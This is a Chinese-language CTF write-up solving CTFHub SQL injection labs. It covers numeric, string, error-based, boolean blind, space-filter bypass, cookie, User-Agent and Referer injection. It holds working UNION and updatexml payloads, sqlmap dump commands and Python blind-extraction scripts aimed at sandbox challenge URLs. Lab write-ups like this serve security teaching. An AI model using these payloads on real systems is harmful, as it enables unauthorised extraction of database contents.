ctfhub web SQL注入 wp

r囧r小猫 2022-10-09 03:11 193阅读 0赞

### 文章目录 ###

*  数字型注入
 *   *  方法1
     *  方法2
 *  字符型注入
 *  报错注入
 *  布尔盲注
 *  过滤空格
 *  MySQL结构
 *  cookie注入
 *  UA注入
 *  referer 注入

# 数字型注入 #

## 方法1 ##

1.  打开题目链接，题目提示为数字型注入，尝试输入1![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center]
2.  使用order by查询字段数为2![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 1]
3.

id=-1 union select 1,2#

查看回显位置![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 2]  
4.

id=-1 union select 1,database()#

获得数据库名![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 3]  
5. 查询数据库中的表名

-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 4]  
6.查询flag列中的所有字段的内容

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
    
    -1 union select 1,group_concat(column_name)from information_schema.columns where table_name='flag'

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 5]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 6]  
7. 查询flag的内容

-1 union select 1,group_concat(flag) from sqli.flag

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 7]

## 方法2 ##

使用sqlmap进行扫描

1.  爆出数据库名sq

sqlmap -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" --current-db

![在这里插入图片描述][20210623161806346.png_pic_center]  
2. 爆数据库中所有的表名news flag

sqlmap -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 8]  
3. 爆数据库中指定表名中的所有列名

sqlmap -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli  -T flag  --columns

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 9]  
4. 爆出flag

sqlmap -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli  -T flag  -C flag --dump

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 10]

# 字符型注入 #

1.尝试单引号闭合，且使用`order by查询`字段数为2

1' order by 2#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 11]  
2.

-1' union select 1,2#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 12]

-1' union select 1,database()#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 13]

-1' union select 1,group_concat(schema_name) from information_schema.schemata#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 14]

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 15]

-1' union select 1,group_concat(column_name)from information_schema.columns where table_name="flag"#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 16]

-1' union select 1,group_concat(flag) from sqli.flag#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 17]

# 报错注入 #

1 order by 3#

查询字段数为2![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 18]

1 and left(database(),1)='s'#

或者burp进行爆破，得出数据库为`sqli`![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 19]

1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 20]

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)),1)#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 21]

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='sqli' limit 1,2)),1)#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 22]

1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='flag' limit 0,1)),1)#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 23]

1 and updatexml(1,concat(0x7e,(select flag from flag)),1)#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 24]

# 布尔盲注 #

1 order by 2#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 25]  
盲注需要猜解大量内容，使用脚本查询当前数据库名

import requests
    import string
    
    url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
    mark = 'query_success'
    
    
    def database_name():
        name = ''
        for i in range(1, 9):
            for j in string.ascii_letters:
                url_db = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
                r = requests.get(url_db)
                if mark in r.text:
                    name += j
                    break
        print('database_name:', name)
    
    
    database_name()

得到当前数据库名为：sqli，继续查询表名：

import requests
    import string
    
    url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
    mark = 'query_success'
    
    
    def table_name():
        list = []
        for i in range(0, 4):
            name = ''
            for j in range(1, 9):
                for k in string.ascii_letters:
                    url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                    r = requests.get(url_t)
                    if mark in r.text:
                        name += k
                        break
            list.append(name)
        print('table_name:', list)
    
    
    table_name()

得到两个表名：news和flag，继续查询flag表中的列：

import requests
    import string
    
    url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
    mark = 'query_success'
    
    
    def columns_name():
        list = []
        for i in range(0, 3):
        	name = ''
            for j in range(1, 9):
                for k in string.ascii_letters:
                    url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                    r = requests.get(url_c)
                    if mark in r.text:
                        name += k
                        break
            list.append(name)
        print('column_name:', list)
    
    
    columns_name()

得到列名也为flag，查询其中内容：

import requests
    import string
    
    url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
    mark = 'query_success'
    
    
    def data():
        name = ''
        for i in range(1, 50):
            for j in range(48, 126):
                url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (i, j)
                r = requests.get(url_d)
                if mark in r.text:
                    name += chr(j)
                    break
        print('data:', name)
    
    
    data()

# 过滤空格 #

由于过滤了空格致使无法执行注入的语句时，可使用以下字符代替空格，发挥同样效果

> `()`：一对圆括号  
> `+`：加号  
> `%09、%0a、%0b、%0c、%0d`：TAB水平制表符、换行符、垂直制表符、换页、回车的URL编码形式  
> `/**/`：块注释符

-1/**/union/**/select/**/database(),2

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 26]

-1/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 27]

-1/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name='oizxqaiznb'

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 28]

-1/**/union/**/select/**/vyynmfkkqi,2/**/from/**/oizxqaiznb

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 29]

# MySQL结构 #

-1 union select 1,database()#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 30]

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 31]

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='zajddjsiyj'#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 32]

-1 union select 1,group_concat(milkrdnvbl) from sqli.zajddjsiyj

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 33]

# cookie注入 #

题目为cookie注入，我们想到使用burp抓包  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 34]

id=1 order by 2#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 35]

id=-1 union select 1,2#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 36]

id=-1 union select 1,database()#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 37]

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 38]

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='twehlohjif' #

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 39]

id=-1 union select 1,group_concat(odfvjpydeq) from sqli.twehlohjif #

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 40]

# UA注入 #

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 41]  
与上一关解题思路相同，只不过注入点是`user-agent`。

# referer 注入 #

抓包后没有看到referer的信息，因此我们可以手动添加一行![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 42]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 43]  
其余注入过程依旧与上一关相同

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center]: /images/20221005/4a0e384fdf5d40bebaa853dc03b8a9b2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221005/6abc7a69ad1a4eb78c7b96703cdd222a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221005/9e0e498164ee4eac94838f95f4756059.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221005/38b857b376bd4f97a969eeda4a3afab8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20221005/95d574fca5d64f079dc352440b53b46b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20221005/96d7c90f4b38444eba8512e30a2c42e0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 6]: /images/20221005/64cac48fe1cf46b786925d6042e431c9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 7]: /images/20221005/28a17e5af9d44bd99eac400636acfb18.png
[20210623161806346.png_pic_center]: /images/20221005/2f72eee7dfe441189ba742ba6ce59cb2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 8]: /images/20221005/b6e87c32ad884db7b5d48523dd87d98b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 9]: /images/20221005/13ade73dd8ec492aaec5e355a99a0b47.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 10]: /images/20221005/6fd2b297467345028f0ba5c776cdfa05.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 11]: /images/20221005/04798dfa09c1476dbb1a4729ad9d788b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 12]: /images/20221005/b24c82ce760b4c7b8347e740da5aac45.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 13]: /images/20221005/b70b6c6441bc403b979ea99fd573efe4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 14]: /images/20221005/8ac720e067cc43e49a26e4147f21abb0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 15]: /images/20221005/13e9c1b39cf346a6ba32c12bef029c06.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 16]: /images/20221005/d1e2ce5cb5224210974d72f187a50cd2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 17]: /images/20221005/075ac670574b4b4ea999c67d39cbf90f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 18]: /images/20221005/45b861bac2ee49a2b9ddc0c3b46143a8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 19]: /images/20221005/6e3891f52fa84ccda2e232fe8173e423.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 20]: /images/20221005/dca8072fc85040fd8d00bb2a7213cd63.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 21]: /images/20221005/46362aca78f1430ab0f4c3cbd23a3876.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 22]: /images/20221005/f51549d5e973405a8540b82aaa721bbe.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 23]: /images/20221005/605179d55565498fa1d5665e6d9f6c74.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 24]: /images/20221005/4a5a0695c1f7472a9d688ce798ba9cd3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 25]: /images/20221005/12146b3a5ae544e38bd99c313c1c9cd2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 26]: /images/20221005/3fa257463b1b40af989d079e36055e8b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 27]: /images/20221005/5be188d2a808461996d7c9569f0cc205.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 28]: /images/20221005/e7380a9aac244b69b0a55a047184ff71.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 29]: /images/20221005/aeb187c10a9d4b2f94d794ee94f2b6e8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 30]: /images/20221005/8f52c3c71dda4eb7a0ca387997b30425.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 31]: /images/20221005/c527907d286e46e69fe2f4b36c744527.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 32]: /images/20221005/8cb00c5618444b2a87d609f44ce7f8ea.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 33]: /images/20221005/4cbc11c093544bcfa1df779a46f6ffc2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 34]: /images/20221005/2cca13144832400496b451dc5237ba66.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 35]: /images/20221005/0309373e28e34b19ad980e2ca2f777b7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 36]: /images/20221005/303c21bcc6464bad96ab5ac08425ed4c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 37]: /images/20221005/480c8e46f5dd4288a24bd056cf5ca570.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 38]: /images/20221005/8954450bdc7b41dc9fe9999840bedd91.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 39]: /images/20221005/39df42dc0f7046848c80bb01e857b6c4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 40]: /images/20221005/a13e028ae89b478199564111d7a142cf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 41]: /images/20221005/22fc3b791ec34746874fd2d9efed39c6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 42]: /images/20221005/5c3e735d3c5647a591c85a5467528320.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 43]: /images/20221005/3e8621265569411584f7c4816c6927ce.png